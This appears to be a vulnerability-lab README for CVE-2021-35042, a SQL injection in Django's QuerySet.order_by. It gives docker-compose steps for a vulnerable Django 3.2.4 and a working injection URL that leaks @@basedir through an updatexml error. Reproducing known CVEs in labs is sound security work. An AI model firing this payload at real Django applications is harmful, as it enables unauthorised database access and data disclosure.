Skip to content

Latest commit

 

History

History
 
 

vultarget

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Django QuerySet.order_by SQL Injection Vulnerability (CVE-2021-35042)

中文版本(Chinese version)

Django released a security update on July 1, 2021, which fixes a SQL injection vulnerability in the function QuerySet.order_by.

Reference link:

The vulnerability requires the developer to use order_by function. Moreover, the input of the queryset can be controlled.

Start Vulnerability Application

Compile and start a vulnerable Django 3.2.4 by executing the following command:

Docker-compose build
Docker-compose up -d

After the environment is started, you can see the home page of Django at http://your-ip:8000.

Vulnerability Reproduce

First, go to the list-view http://your-ip:8000/vuln/ and add order=-id to the GET parameter.

http://your-ip:8000/vuln/?order=-id

You will see the data sorted by id in descending order:

Add order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23 to the GET parameter, where vuln is your app and collection is the models.

http://your-ip:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23

You can see that the single bracket has been injected successfully, and you can get the information from the error: